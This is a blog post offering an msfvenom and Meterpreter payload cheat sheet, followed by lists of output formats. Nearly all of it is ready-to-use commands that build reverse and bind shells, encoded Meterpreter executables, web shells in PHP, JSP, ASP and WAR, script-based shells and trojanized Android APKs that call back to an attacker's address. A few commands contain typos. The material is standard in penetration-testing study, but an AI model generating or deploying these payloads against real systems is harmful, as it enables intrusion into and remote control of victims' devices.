GEEKPRATIK
28Avr/20

MsfVenom Payload Cheat Sheet | Meterpreter Payload Cheat Sheet

MSFvenom Payload Creator (MSFPC) is a user-friendly multiple payload generator that can be used to generate Metasploit payloads based on user-selected options.

Content Replace
ip-address => Attacker ip address
port => Attacker port

Metasploit Payload Listener

  • msfdb run
  • use exploit/multi/handler
  • set payload-name
  • set ip-address
  • set port
  • Run

Windows Payloads

Windows Meterpreter Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe

Windows Reverse Shell

msfvenom -p windows/shell/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe

Windows Encoded Meterpreter Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 2 -f exe > payload-name.exe

Windows Meterpreter Reverse Shellcode

 msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform 

macOS Payloads

macOS Bind Shell

msfvenom -p osx/x86/shell_bind_tcp rhost=ip-address lport=port-f macho > payload-name.macho

macOS Reverse Shell

msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f macho > payload-name.macho

macOS Reverse TCP Shellcode

msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f < platform 

Linux Payloads

Linux Meterpreter TCP Reverse Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f elf > payload-name.elf

Linux Bind TCP Shell

 msfvenom -p generic/shell_bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf

Linux Bind Meterpreter TCP Shell

 msfvenom -p linux/x86/meterpreter/bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf

Linux Meterpreter Reverse Shellcode

 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform 

Web-base Payloads

PHP Meterpreter Reverse Shell

 msfvenom -p php/meterpreter_reverse_tcp lhost=ip-address LPORT=port -f raw > payload-name.php

JSP Java Meterpreter Reverse Shell

 msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f raw > payload-name.jsp

ASP Meterpreter Reverse Shell

 msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f asp > payload-nmae.asp

WAR Reverse TCP Shell

 msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f war > payload-name.war

Script-Base Payloads

Perl Unix Reverse shell

 msfvenom -p cmd/unix/reverse_perl lhost=ip-address lport=port -f raw > payload-name.pl

Bash Unix Reverse Shell

 msfvenom -p cmd/unix/reverse_bash lhost=ip-address lport=port -f raw > payload-name.sh

Python Reverse Shell

 msfvenom -p cmd/unix/reverse_python lhost=ip-address lport=port -f raw > payload-name.py

Android Payloads

Android Meterpreter reverse Payload

msfvenom –p android/meterpreter/reverse_tcp lhost=ip-address lport=port R > payload-name.apk

Android Embed Meterpreter Payload

msfvenom -x <app.apk> android/meterpreter/reverse_tcp lhost=ip-address lport=port -o payload-name.apk

MsfVenom Payload Formate

    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

Framework Transform Formats [--format <value>]
==============================================

    Name
    ----
    bash
    c
    csharp
    dw
    dword
    hex
    java
    js_be
    js_le
    num
    perl
    pl
    powershell
    ps1
    py
    python
    raw
    rb
    ruby
    sh
    vbapplication
    vbscript
Partager sur Facebook Partager sur Google+ Partager sur Digg Partager sur Reddit Partager sur Delicious Partager sur Delicious Partager sur Delicious Partager sur folkd
28/04/2020
Commentaires (0)

Aucun commentaire pour l'instant


Poster un commentaire

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.

Trackbacks are disabled.